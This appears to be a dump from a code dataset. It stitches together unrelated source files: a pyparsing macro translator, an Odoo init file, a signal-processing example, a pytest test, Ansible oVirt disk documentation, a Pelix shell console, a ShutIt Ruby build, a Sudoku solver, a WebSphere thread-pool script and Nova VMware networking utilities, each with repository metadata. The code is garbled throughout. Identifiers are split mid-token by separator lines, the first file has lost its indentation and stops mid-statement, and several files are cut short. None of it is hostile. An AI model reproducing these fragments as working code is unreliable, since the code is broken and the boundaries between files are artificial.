from pyparsing import OneOrMore, nestedExpr
import re
def splitParameterString(theString):
toFilter = re.compile("(<<(?:[^\s]+)>>)").split(theString)
return filter(lambda a: a != '', toFilter)
def getRegexFromString(theString):
theSplitString = splitParameterString(theString)
for x in range(0, len(theSplitString)):
if theSplitString[x].startswith("<<") and theSplitString[x].endswith(">>"):
theSplitString[x] = "([^\s]+)"
return re.compile("".join(theSplitString))
def splitStatement(theRegex, stringToSplit):
return re.match(theRegex, stringToSplit).groups()
def getThingToCheckAgainstRegex(theArray):
theCounter = 0
toReturn = ""
for idx, current in enumerate(theArray):
if(idx != 0):
toReturn += " "
if (type(current) != str or (ty
|
pe(current) == str) and (("'" in current) or ('"' in current))):
theCounter +
|
= 1
toReturn += "<<" + str(theCounter) + ">>"
else:
toReturn += current
return toReturn
stringToTest = "(replace(?: each| every|)) <<foo>> (in|inside(?: of)|within) <<bar>> (with) <<baz>>"
theRegex = getRegexFromString(stringToTest)
print(splitParameterString(stringToTest))
print(splitStatement(theRegex, "replace (a) in b with c"))
print(splitStatement(theRegex, "replace a within b with c"))
print(splitStatement(theRegex, "replace a inside of b with c"))
print(splitStatement(theRegex, "replace every a in b with c"))
#I'm still working on crossLanguageParser.py, but I'm trying to see if I can get this new syntax to work.
#This is supposed to be a re-write of crossLanguageParser.py, using Polish notation.
#evaluateMacro is the main function here.
#print(getThingToCheckAgainstRegex(["the", "type", "of", ["foo", "goo"], "is", "'bar'"]))
def isParameter(theString):
if theString.startswith("<<") and theString.endswith(">>"):
return True
arrayOfOutputs = [
[["<<type>> [ <<dimensions>> ] <<name>> = <<initialValue>>", "<<type>> <<name>> [ <<dimensions>> ] = <<initialValue>>"], "initializeVar('<<name>>', '<<type>>', <<initialValue>>, <<dimensions>>)", "final"],
[["<<type>> <<name>> = <<initialValue>>"], "(<<type>> [ None ] <<name>> = <<initialValue>>)"],
#def initializeVar(variableName, variableType, initialValue, arrayDimensions):
[["def <<isStatic>> <<returnType>> <<functionName>> <<parameterNames>> <<parameterTypes>> <<body>>"], "getFunction('<<functionName>>', '<<isStatic>>', <<parameterNames>>, <<parameterTypes>>, '<<returnType>>', <<body>>)", "final"],
[["return <<toReturn>>",], "Return(<<toReturn>>)", "final"],
[["while <<condition>> <<action>>"], "whileLoop([<<action>>], <<condition>>)", "final"],
[["switch <<condition>> <<action>>",], "switch(<<condition>>, [<<action>>])", "final"],
[["case <<condition>> <<action>>"], "case(<<condition>>, [<<action>>])", "final"],
[["else <<action>>", "else { <<action>> }"], "Else([<<action>>])", "final"],
[["if <<condition>> then <<output>>", "<<output>> unless <<condition>> is false", "if <<condition>> { <<output>> }", "<<output>> if <<condition>>", "<<output>> if and only if <<condition>>", "if <<condition>> <<output>>"], "If(<<condition>>, [<<output>>])", "final"],
[["elif <<condition>> <<action>>", "else if <<condition>> then <<action>>"], "Elif(<<condition>>, [<<action>>])", "final"],
[["<<param1>> ; <<param2>>", "<<param1>> , <<param2>>"], "<<param1>>,<<param2>>", "final"],
[["<<param1>> ;", "<<param1>> ,"], "<<param1>>,", "final"],
[["module <<body>>"], "module([<<body>>])", "final"],
[["main <<body>>"], "main([<<body>>])", "final"],
[["<<value1>> == <<value2>>", "<<value1>> is <<value2>>", "<<value1>> equals <<value2>>", "<<value1>> is equal to <<value2>>"], "equals(<<value1>>, <<value2>>, 'int')", "final"],
[["<<item>> is in <<array>>", "<<array>> contains <<item>>"], "(<<item>> in <<array>>)", "final"],
#If it ends in "final", then the output string is directly returned.
[["not <<x>>", "! <<x>>"], "Not(<<x>>)", "final"],
[["replace each <<contained>> in <<container>> with <<replacement>>", "replace every <<contained>> in <<container>> with <<replacement>>"], "replace each <<contained>> in <<container>> with <<replacement>>", "final"],
#If there are only 3 items in the array, then the output is translated into another macro
[["unless <<condition>> <<action>>", "<<action>> unless <<condition>>"], "(if (not <<condition>>) then <<action>>)"],
[["while <<condition>> <<action>>", "<<action>> while <<condition>>", "do <<action>> while <<condition>> is true", "<<action>> until <<condition>> becomes false"], "while(<<condition>>){<<action>>}", "final"],
#"eval" means the output string will be directly evaluated.
[["<<thing1>> means <<thing2>>"], "addToArray(<<thing1>>, <<thing2>>)", "eval"],
[["<<functionName>> { <<parameterList>> }"], "callFunction('<<functionName>>', None, [<<parameterList>>])", "final"],
[["<<param1>> + <<param2>>", "<<param1>> plus <<param2>>"], "add([<<param1>>, <<param2>>])", "final"],
[["<<param1>> - <<param2>>"], "subtract(<<param1>>, <<param2>>)", "final"],
[["<<param1>> * <<param2>>"], "multiply(<<param1>>, <<param2>>)", "final"],
[["<<param1>> / <<param2>>", "<<param1>> divided by <<param2>>"], "divide(<<param1>>, <<param2>>)", "final"],
[["<<param1>> % <<param2>>"], "Mod([<<param1>>, <<param2>>])", "final"],
[["<<param1>> or <<param2>>", "<<param1>> || <<param2>>"], "Or(<<param1>>, <<param2>>)", "final"],
[["<<param1>> > <<param2>>", "<<param1>> is greater than <<param2>>"], "greaterThan(<<param1>>, <<param2>>)", "final"],
[["<<param1>> < <<param2>>", "<<param1>> is less than <<param2>>>>"], "lessThan(<<param1>>, <<param2>>)", "final"],
[["<<param1>> <= <<param2>>"], "lessThanOrEqualTo(<<param1>>, <<param2>>)", "final"],
[["<<param1>> >= <<param2>>"], "greaterThanOrEqualTo(<<param1>>, <<param2>>)", "final"],
[["<<param1>> and <<param2>>", "<<param1>> && <<param2>>" "<<param1>> & <<param2>>"], "And(<<param1>>, <<param2>>)", "final"],
[["class <<className>> { <<body>> }",], "getClass(<<className>>, <<body>>)", "final"],
#def getClass(className, body):
[["<<param>> ++"], "(<<param>> += 1)"],
[["<<param>> --"], "(<<param>> -= 1)"],
[["seriesOfStatements <<param>>", "series of statements <<param>>"], "seriesOfStatements([<<param>>])", "final"],
[["<<param1>> += <<param2>>"], "(<<param1>> = (<<param1>> + <<param2>>))"],
[["<<param1>> -= <<param2>>"], "(<<param1>> = (<<param1>> - <<param2>>))"],
[["<<param1>> *= <<param2>>"], "(<<param1>> = (<<param1>> * <<param2>>))"],
[["<<param1>> ^= <<param2>>"], "(<<param1>> = (<<param1>> ^ <<param2>>))"],
[["<<param1>> = <<param2>>"], "setVar(<<param2>>, <<param1>>)", "final"],
#def setVar(valueToGet, valueToChange):
[["for <<initializer>> <<condition>> <<increment>> <<action>>", "for <<initializer>> ; <<condition>> ; <<increment>> { <<action>> }"], "forLoop(<<action>>, <<initializer>>, <<condition>>, <<increment>>)", "final"],
#def forLoop(body, initializer, condition, increment):
[["for <<variable>> from <<start>> to <<end>> <<action>>"], "(for [ (<<variable>> = <<start>>) ; (<<variable>> < <<end>>) ; (<<variable>> ++) ] { <<action>> })"],
[["<<param1>> ^ <<param2>>", "<<param1>> to the power of <<param2>>", "param1 ** param2"], "<<param1>>^<<param2>>", "final"],
[["[ <<param>> ]"], "[<<param>>]", "final"],
[["<<className>> . <<methodName>> { <<methodParameters>> }"], "<<className>>.<<methodName>>(<<methodParameters>>)", "final"]
]
def addToArray(thing1, thing2):
global arrayOfOutputs
thing2 = ("(" + thing2 + ")")
thing2 = list(OneOrMore(nestedExpr()).parseString(thing2)[0])
thing1 = thing1.split(" ")
arrayOfOutputs += [[thing1, thing2]]
for idx1, current1 in enumerate(arrayOfOutputs):
currentStringOutput = current1[1]
for idx2, current2 in enumerate(current1[0]):
current1[0][idx2] = current1[0][idx2].split(" ")
if(len(current1) ==
|
t3dev/odoo
|
addons/event/__init__.py
|
Python
|
gpl-3.0
| 189
| 0
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing detai
|
ls.
from . import controllers
from . import models
from . import wizard
from
|
. import report
|
miltonsarria/dsp-python
|
filters/ex2/ejemplo_window.py
|
Python
|
mit
| 1,773
| 0.038917
|
#procesamiento digital de senales
#universidad santiago de cali
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('tools/')
from fourierFunc import fourierAn
from scipy.signal import get_window
##########################################
#BLOQUE 1
#definir la frecuencia de muestreo
Fs=60
tf=5 #tiempo final
#definir la secuencia de tiempo hasta 5 segundos
nT=np.linspace(1./Fs,tf,Fs*tf);
#definir dos componentes frecuenciales en Hz y calcular su equivalente en rad/s
F1=7
F2=6
#omega
w1=2*np.pi*F1
w2=2*np.pi*F2
#definir ventana
window = 'hanning'
#secuencias separadas
x1=2*np.sin(w1*nT)
x2=1*np.cos(w2*nT)
#generar secuencia discreta x[n]=x1[n]+x2[n]
x=2*np.sin(w1*nT)+1*np.cos(w2*nT)
N=512
n=nT.size
x=np.hstack((np.zeros(int((N-n)/2)),x,np.zeros(int((N-n)/2))))
x1=np.hstack((np.zeros(int((N-n)/2)),x1,np.zeros(int((N-n)/2))))
x2=np.hstack((np.zeros(int((N-n)/2)),x2,np.zeros(int((N-n)/2))))
#gener
|
ar ventana
M = n
w = get_window(window, M)
print(M)
w=np.hstack((np.zeros(int((N-n)/2)),w,np.zeros(int((N-n)/2))))
print(w.shape)
xw=x*w
xw1=x1*w
xw2=x2*w
#usar fourier
absX,Xdb,pX=fourierAn(x)
f=np.linspace(-Fs/2,Fs/2,Xdb.size)
absXw,Xdbw,pXw=fourierAn(xw)
absXw1,Xdbw1,pXw2=fourierAn(xw1)
absXw2,Xdbw2,pXw2=fourierAn(xw2)
#visualizar los resultados del analisis hecho con transformada de fourier
plt.subplot(411)
plt.plot(x1)
plt.ylabel('x1[n]')
plt.subplot(412)
plt.p
|
lot(x2)
plt.ylabel('x2[n]')
plt.subplot(413)
plt.plot(x)
plt.ylabel('x[n]=x1[n]+x2[n]')
plt.subplot(414)
plt.plot(xw)
plt.ylabel('x[n]*w[n]')
plt.xlabel('tiempo - s')
plt.figure(2)
plt.subplot(311)
plt.plot(f,Xdbw)
plt.subplot(312)
plt.plot(f,Xdbw1)
plt.subplot(313)
plt.plot(f,Xdbw2)
plt.show()
|
vdrhtc/Measurement-automation
|
tests/test_keysight11713C.py
|
Python
|
gpl-3.0
| 249
| 0.004016
|
import pytest
from drivers.keysight11713C import *
@pytest.mark.skip
def test_set_get():
attenuator = Keysight11713C("swc1", "Y")
for i in range(82):
attenuat
|
or.set_attenuation(i)
assert i == att
|
enuator.get_attenuation()
|
Jorge-Rodriguez/ansible
|
lib/ansible/modules/cloud/ovirt/ovirt_disk.py
|
Python
|
gpl-3.0
| 29,884
| 0.002577
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_disk
short_description: "Module to manage Virtual Machine and floating disks in oVirt/RHV"
version_added: "2.2"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage Virtual Machine and floating disks in oVirt/RHV."
options:
id:
description:
- "ID of the disk to manage. Either C(id) or C(name) is required."
name:
description:
- "Name of the disk to manage. Either C(id) or C(name)/C(alias) is required."
aliases: ['alias']
description:
description:
- "Description of the disk image to manage."
version_added: "2.5"
vm_name:
description:
- "Name of the Virtual Machine to manage. Either C(vm_id) or C(vm_name) is required if C(state) is I(attached) or I(detached)."
vm_id:
description:
- "ID of the Virtual Machine to manage. Either C(vm_id) or C(vm_name) is required if C(state) is I(attached) or I(detached)."
state:
description:
- "Should the Virtual Machine disk be present/absent/attached/detached."
choices: ['present', 'absent', 'attached', 'detached']
default: 'present'
download_image_path:
description:
- "Path on a file system where disk should be downloaded."
- "Note that you must have an valid oVirt/RHV engine CA in your system trust store
or you must provide it in C(ca_file) parameter."
- "Note that the disk is not downloaded when the file already exists,
but you can forcibly download the disk when using C(force) I (true)."
version_added: "2.3"
upload_image_path:
description:
- "Path to disk image, which should be uploaded."
- "Note that currently we support only compatibility version 0.10 of the qcow disk."
- "Note that you must have an valid oVirt/RHV engine CA in your system trust store
or you must provide it in C(ca_file) parameter."
- "Note that there is no reliable way to achieve idempotency, so
if you want to upload the disk even if the disk with C(id) or C(name) exists,
then please use C(force) I(true). If you will use C(force) I(false), which
is default, then the disk image won't be uploaded."
version_
|
added: "2.3"
size:
description:
- "Size of the disk. Size should be specified using IEC standard units.
For example 10GiB, 1024MiB, etc."
- "Size can be only increased, not decreased."
interface:
description:
- "Driver of the storage interface."
|
- "It's required parameter when creating the new disk."
choices: ['virtio', 'ide', 'virtio_scsi']
default: 'virtio'
format:
description:
- Specify format of the disk.
- Note that this option isn't idempotent as it's not currently possible to change format of the disk via API.
choices: ['raw', 'cow']
content_type:
description:
- Specify if the disk is a data disk or ISO image
choices: ['data', 'iso']
default: 'data'
version_added: "2.8"
sparse:
required: False
type: bool
version_added: "2.5"
description:
- "I(True) if the disk should be sparse (also known as I(thin provision)).
If the parameter is omitted, cow disks will be created as sparse and raw disks as I(preallocated)"
- Note that this option isn't idempotent as it's not currently possible to change sparseness of the disk via API.
storage_domain:
description:
- "Storage domain name where disk should be created. By default storage is chosen by oVirt/RHV engine."
storage_domains:
description:
- "Storage domain names where disk should be copied."
- "C(**IMPORTANT**)"
- "There is no reliable way to achieve idempotency, so every time
you specify this parameter the disks are copied, so please handle
your playbook accordingly to not copy the disks all the time. This
is valid only for VM and floating disks, template disks works
as expected."
version_added: "2.3"
force:
description:
- "Please take a look at C(image_path) documentation to see the correct
usage of this parameter."
version_added: "2.3"
type: bool
profile:
description:
- "Disk profile name to be attached to disk. By default profile is chosen by oVirt/RHV engine."
quota_id:
description:
- "Disk quota ID to be used for disk. By default quota is chosen by oVirt/RHV engine."
version_added: "2.5"
bootable:
description:
- "I(True) if the disk should be bootable. By default when disk is created it isn't bootable."
type: bool
shareable:
description:
- "I(True) if the disk should be shareable. By default when disk is created it isn't shareable."
type: bool
logical_unit:
description:
- "Dictionary which describes LUN to be directly attached to VM:"
- "C(address) - Address of the storage server. Used by iSCSI."
- "C(port) - Port of the storage server. Used by iSCSI."
- "C(target) - iSCSI target."
- "C(lun_id) - LUN id."
- "C(username) - CHAP Username to be used to access storage server. Used by iSCSI."
- "C(password) - CHAP Password of the user to be used to access storage server. Used by iSCSI."
- "C(storage_type) - Storage type either I(fcp) or I(iscsi)."
sparsify:
description:
- "I(True) if the disk should be sparsified."
- "Sparsification frees space in the disk image that is not used by
its filesystem. As a result, the image will occupy less space on
the storage."
- "Note that this parameter isn't idempotent, as it's not possible
to check if the disk should be or should not be sparsified."
version_added: "2.4"
type: bool
openstack_volume_type:
description:
- "Name of the openstack volume type. This is valid when working
with cinder."
version_added: "2.4"
image_provider:
description:
- "When C(state) is I(exported) disk is exported to given Glance image provider."
- "C(**IMPORTANT**)"
- "There is no reliable way to achieve idempotency, so every time
you specify this parameter the disk is exported, so please handle
your playbook accordingly to not export the disk all the time.
This option is valid only for template disks."
version_added: "2.4"
host:
description:
- "When the hypervisor name is specified the newly created disk or
an existing disk will refresh its information about the
underlying storage( Disk size, Serial, Product ID, Vendor ID ...)
The specified host will be used for gathering the storage
related information. This option is only valid for passthrough
disks. This option requires at least the logical_unit.id to be
specified"
version_added: "2.8"
wipe_after_delete:
description:
- "If the disk's Wipe After Delete is enabled, then the disk is first wiped."
type: bool
activate:
description:
- I(True) if the disk should be activated.
version_added: "2.8"
type: bool
extends_documentation_fragment:
|
tcalmant/ipopo
|
pelix/shell/console.py
|
Python
|
apache-2.0
| 20,364
| 0.000049
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Pelix interactive shell
Provides a console interface for the Pelix shell, based on readline when
available.
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import argparse
import logging
import os
import shlex
import sys
import threading
# Initialization file handler
from pelix.misc.init_handler import InitFileHandler, remove_duplicates
# Shell constants
from pelix.constants import BundleActivator
from pelix.shell import SERVICE_SHELL
from pelix.shell.beans import IOHandler, ShellSession, safe_input
import pelix.framework as pelix
# Shell completion
from pelix.shell.completion.core import completion_hints
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
PROP_INIT_FILE = "pelix.shell.console.init_file"
""" Shell script to execute before starting the console """
PROP_RUN_FILE = "pelix.shell.console.script_file"
""" Script to run as shell input """
# ------------------------------------------------------------------------------
try:
# Set up readline if available
import readline
readline.parse_and_bind("tab: complete")
readline.set_completer(None)
except ImportError:
# Readline is missing, not critical
readline = None
# ------------------------------------------------------------------------------
class InteractiveShell(object):
"""
The interactive shell handler
"""
def __init__(self, context):
"""
Sets up the members
:param context: The bundle context
"""
self._context = context # type: pelix.BundleContext
self._shell_ref = None # type: pelix.ServiceReference
self._shell = None
# Single session
self.__session = ShellSession(IOHandler(sys.stdin, sys.stdout), {})
# Read line cache
self._readline_matches = []
# Rendez-vous events
self._lock = threading.RLock()
self._stop_event = threading.Event()
self._shell_event = threading.Event()
# Try to find a shell service
self.search_shell()
# Register as a service listener
self._context.add_service_listener(self, None, SERVICE_SHELL)
def __get_ps1(self):
"""
Gets the prompt string from the session of the shell service
:return: The prompt string
"""
try:
return self.__session.get("PS1")
except KeyError:
return self._shell.get_ps1()
def _readline_prompt(self):
"""
Prompt using the readline module (no pre-flush)
:return: The command line
"""
sys.stdout.flush()
return safe_input(self.__get_ps1())
def _normal_prompt(self):
"""
Flushes the prompt before requesting the input
:return: The command line
"""
sys.stdout.write(self.__get_ps1())
sys.stdout.flush()
return safe_input()
def loop_input(self, on_quit=None):
"""
Reads the standard input until the shell session is stopped
:param on_quit: A call back method, called without argument when the
shell session has ended
"""
# Start the init script
self._run_script(
self.__session, self._context.get_property(PROP_INIT_FILE)
)
# Run the script
script_file = self._context.get_property(PROP_RUN_FILE)
i
|
f script_file:
self._run_script(self.__session, script_file)
else:
# No script: run the main loop (blocking)
self._run_loop(self.__session)
# Nothing more to do
self._stop_event.set()
sys.stdout.write("Bye !\n")
sys.stdout.flush()
if on_quit is not None:
# Call a handler if needed
on_quit()
def _run_script(self, se
|
ssion, file_path):
"""
Runs the given script file
:param session: Current shell session
:param file_path: Path to the file to execute
:return: True if a file has been execute
"""
if file_path:
# The 'run' command returns False in case of error
# The 'execute' method returns False if the run command fails
return self._shell.execute('run "{0}"'.format(file_path), session)
return None
def _run_loop(self, session):
"""
Runs the main input loop
:param session: Current shell session
"""
try:
first_prompt = True
# Set up the prompt
prompt = (
self._readline_prompt
if readline is not None
else self._normal_prompt
)
while not self._stop_event.is_set():
# Wait for the shell to be there
# Before Python 2.7, wait() doesn't return a result
if self._shell_event.wait(.2) or self._shell_event.is_set():
# Shell present
if first_prompt:
# Show the banner on first prompt
sys.stdout.write(self._shell.get_banner())
first_prompt = False
# Read the next line
line = prompt()
with self._lock:
if self._shell_event.is_set():
# Execute it
self._shell.execute(line, session)
elif not self._stop_event.is_set():
# Shell service lost while not stopping
sys.stdout.write("Shell service lost.")
sys.stdout.flush()
except (EOFError, KeyboardInterrupt, SystemExit):
# Input closed or keyboard interruption
pass
def readline_completer(self, text, state):
"""
A completer for the readline library
"""
if state == 0:
# New completion, reset the list of matches and the display hook
self._readline_matches = []
try:
readline.set_completion_display_matches_hook(None)
except AttributeError:
pass
# Get the full line
full_line = readline.get_line_buffer()
begin_idx = readline.get_begidx()
# Parse arguments as best as we can
try:
arguments = shlex.split(full_line)
except ValueError:
arguments = full_line.split()
# Extract the command (maybe with its namespace)
command = arguments.pop(0)
if begin_idx > 0:
# We're completing after the command (and maybe some args)
try:
# Find the command
ns, command = self._shell.get_ns_command(command)
except ValueError:
# Ambiguous command: ignore
return None
# Use the completer associated to the command, if any
try:
configuration = self._shell.get_command_co
|
secnot/uva-onlinejudge-solutions
|
989 - Su Doku/main.py
|
Python
|
mit
| 2,568
| 0.005062
|
import sys
from copy import deepcopy
from math import sqrt
def read_num():
return list(map(int, sys.stdin.readline().split()))
def read_sudoku():
try:
n = read_num()
if not n:
n = read_num()
n = n[0]
return [read_num() for _ in range(n*n)]
except Exception:
return None
def print_sudoku(s):
for l in s:
print(" ".join(map(str, l)))
class Sudoku(object):
def __init__(self, board):
# cell size
self._dim = int(sqrt(len(board)))
# Remaining open spaces
self._nfree = sum(1 for l in board for i in l if not i)
# Moved made
self._moves = []
|
self._board = deepcopy(board)
def _undo_move(self):
x, y = self._moves.pop()
self._board[x][y] = 0
self._nfree += 1
def _make_move(self, x, y, value):
self._moves.append((x, y))
self._board[x][y] = value
self._nfree -= 1
def _possible_values(self, x, y):
# Horizontal restrictions
h = self._board[x]
# Vertical restrictions
v = [self._board[i][y] for i in range(len(self._board))]
|
# Square restrictions
square_x, square_y = (x//self._dim)*self._dim, (y//self._dim)*self._dim
s = [self._board[square_x+i][square_y+j]
for i in range(self._dim)
for j in range(self._dim)]
# Return values not present in any restriction
restrictions = set(h+v+s)
return [x for x in range(1, len(self._board)+1) if x not in restrictions]
def _construct_candidates(self):
for i in range(len(self._board)):
for j in range(len(self._board)):
if not self._board[i][j]:
return [(i, j, v) for v in self._possible_values(i, j)]
return []
def is_solved(self):
return not bool(self._nfree)
def solve(self):
if self.is_solved():
return
candidates = self._construct_candidates()
for c in candidates:
self._make_move(*c)
self.solve()
if self.is_solved():
return
self._undo_move()
def print(self):
if self.is_solved():
print_sudoku(self._board)
else:
print('NO SOLUTION')
if __name__ == '__main__':
sudoku = read_sudoku()
while sudoku:
su = Sudoku(sudoku)
su.solve()
su.print()
sudoku = read_sudoku()
if sudoku:
print('')
|
muthu-s/chef-repo
|
cookbooks/wsi/files/configurethreadpool.py
|
Python
|
apache-2.0
| 1,835
| 0.012534
|
import os;
import sys;
import traceback;
#####################################################################
## Update Thread Pool size
#####################################################################
def configureThreadPool(clusterName, threadPoolName, minSize, maxSize):
print "Cluster Name = " + clusterName + "\n"
clusterID = AdminConfig.getid("/ServerCluster:" + clusterName + "/")
serverList=AdminConfig.list('ClusterMember', clusterID)
servers=serverList.split("\n")
for serverID in servers:
serverName=AdminConfig.showAttribute(serverID, 'memberName')
print "ServerName = " + serverName + "\n"
server=AdminConfig.getid("/Server:" +serverName + "/")
threadPool = AdminConfig.list("ThreadPool",server)
for thread in threadPool.split("\n"):
n
|
ame = AdminConfig.showAttribute(thread, "name")
if (name == threadPoolName):
AdminConfig.modify(thre
|
ad, [['minimumSize', minSize],['maximumSize', maxSize]])
print name + " thread pool updated with minSize:" + minSize + " and maxSize:" + maxSize
AdminConfig.save()
#####################################################################
## Main
#####################################################################
if len(sys.argv) != 4:
print "This script requires clusterName, threadPoolName(WebContainer/Default/ORB.thread.pool...), minSize, maxSize"
sys.exit(1)
else:
clusterName = sys.argv[0]
threadPoolName = sys.argv[1]
minSize = sys.argv[2]
maxSize = sys.argv[3]
configureThreadPool(clusterName, threadPoolName, minSize, maxSize)
|
ianmiell/shutit-distro
|
ruby/ruby.py
|
Python
|
gpl-2.0
| 863
| 0.040556
|
"""ShutIt module. See http://shutit.tk
"""
from shut
|
it_module import ShutItModule
class ruby(ShutItModule):
def build(self, shutit):
shutit.send('mkdir -p /tmp/build/ruby')
shutit.send('cd /tmp/build/ruby')
shutit.send('wget -qO- http:/
|
/cache.ruby-lang.org/pub/ruby/2.2/ruby-2.2.0.tar.gz | tar -zxf -')
shutit.send('cd ruby*')
shutit.send('./configure --prefix=/usr')
shutit.send('make')
shutit.send('make install')
return True
#def get_config(self, shutit):
# shutit.get_config(self.module_id,'item','default')
# return True
def finalize(self, shutit):
shutit.send('rm -rf /tmp/build/ruby')
return True
#def remove(self, shutit):
# return True
#def test(self, shutit):
# return True
def module():
return ruby(
'shutit.tk.sd.ruby.ruby', 158844782.0025,
description='',
maintainer='',
depends=['shutit.tk.setup']
)
|
ntt-sic/nova
|
nova/virt/vmwareapi/network_util.py
|
Python
|
apache-2.0
| 7,362
| 0.002309
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility functions for ESX Networking.
"""
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vm_util
LOG = logging.getLogger(__name__)
def get_network_with_the_name(session, network_name="vmnet0", cluster=None):
"""
Gets reference to the network whose name is passed as the
argument.
"""
host = vm_util.get_host_ref(session, cluster)
if cluster is not None:
vm_networks_ret = session._call_method(vim_util,
"get_dynamic_property", cluster,
"ClusterComputeResource",
"network")
else:
vm_networks_ret = session._call_method(vim_util,
"get_dynamic_property", host,
"HostSystem", "network")
# Meaning there are no networks on the host. suds responds with a ""
# in the parent property field rather than a [] in the
# ManagedObjectReference property field of the parent
if not vm_networks_ret:
return None
vm_networks = vm_networks_ret.ManagedObjectReference
network_obj = {}
LOG.debug(vm_networks)
for network in vm_networks:
# Get network properties
if network._type == 'DistributedVirtualPortgroup':
props = session._call_method(vim_util,
"get_dynamic_property", network,
"DistributedVirtualPortgroup", "config")
# NOTE(asomya): This only works on ESXi if the port binding is
# set to ephemeral
if props.name == network_name:
network_obj['type'] = 'DistributedVirtualPortgroup'
network_obj['dvpg'] = props.key
dvs_props = session._call_method(vim_util,
"get
|
_dynamic_property",
props.distributedVirtualSwitch,
"VmwareDistributedVirtualSwitch", "uuid")
network_obj['dvsw'] = dvs_props
else:
props = session._call_method(vim_util,
"get_dynamic_property", network,
"Network", "summary.name")
if props
|
== network_name:
network_obj['type'] = 'Network'
network_obj['name'] = network_name
if (len(network_obj) > 0):
return network_obj
def get_vswitch_for_vlan_interface(session, vlan_interface, cluster=None):
"""
Gets the vswitch associated with the physical network adapter
with the name supplied.
"""
# Get the list of vSwicthes on the Host System
host_mor = vm_util.get_host_ref(session, cluster)
vswitches_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.vswitch")
# Meaning there are no vSwitches on the host. Shouldn't be the case,
# but just doing code check
if not vswitches_ret:
return
vswitches = vswitches_ret.HostVirtualSwitch
# Get the vSwitch associated with the network adapter
for elem in vswitches:
try:
for nic_elem in elem.pnic:
if str(nic_elem).split('-')[-1].find(vlan_interface) != -1:
return elem.name
# Catching Attribute error as a vSwitch may not be associated with a
# physical NIC.
except AttributeError:
pass
def check_if_vlan_interface_exists(session, vlan_interface, cluster=None):
"""Checks if the vlan_interface exists on the esx host."""
host_mor = vm_util.get_host_ref(session, cluster)
physical_nics_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.pnic")
# Meaning there are no physical nics on the host
if not physical_nics_ret:
return False
physical_nics = physical_nics_ret.PhysicalNic
for pnic in physical_nics:
if vlan_interface == pnic.device:
return True
return False
def get_vlanid_and_vswitch_for_portgroup(session, pg_name, cluster=None):
"""Get the vlan id and vswicth associated with the port group."""
host_mor = vm_util.get_host_ref(session, cluster)
port_grps_on_host_ret = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "config.network.portgroup")
if not port_grps_on_host_ret:
msg = _("ESX SOAP server returned an empty port group "
"for the host system in its response")
LOG.error(msg)
raise exception.NovaException(msg)
port_grps_on_host = port_grps_on_host_ret.HostPortGroup
for p_gp in port_grps_on_host:
if p_gp.spec.name == pg_name:
p_grp_vswitch_name = p_gp.vswitch.split("-")[-1]
return p_gp.spec.vlanId, p_grp_vswitch_name
def create_port_group(session, pg_name, vswitch_name, vlan_id=0, cluster=None):
"""
Creates a port group on the host system with the vlan tags
supplied. VLAN id 0 means no vlan id association.
"""
client_factory = session._get_vim().client.factory
add_prt_grp_spec = vm_util.get_add_vswitch_port_group_spec(
client_factory,
vswitch_name,
pg_name,
vlan_id)
host_mor = vm_util.get_host_ref(session, cluster)
network_system_mor = session._call_method(vim_util,
"get_dynamic_property", host_mor,
"HostSystem", "configManager.networkSystem")
LOG.debug(_("Creating Port Group with name %s on "
"the ESX host") % pg_name)
try:
session._call_method(session._get_vim(),
"AddPortGroup", network_system_mor,
portgrp=add_prt_grp_spec)
except error_util.VimFaultException as exc:
# There can be a race condition when two instances try
# adding port groups at the same time. One succeeds, then
# the other one will get an exception. Since we are
# concerned with the port group being created, which is done
# by the other call, we can ignore the exception.
if error_util.FAULT_ALREADY_EXISTS not in exc.fault_list:
raise exception.NovaException(exc)
LOG.debug(_("Created Port Group with name %s on "
"the ESX host") % pg_name)
|
Comunitea/CMNT_004_15
|
project-addons/product_outlet_loss/models/product.py
|
Python
|
agpl-3.0
| 1,853
| 0.00054
|
##############################################################################
#
# Copyright (C) 2014 Comunitea Servicios Tecnológicos All Rights Reserved
# $Kiko Sánchez <kiko@comunitea.com>$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
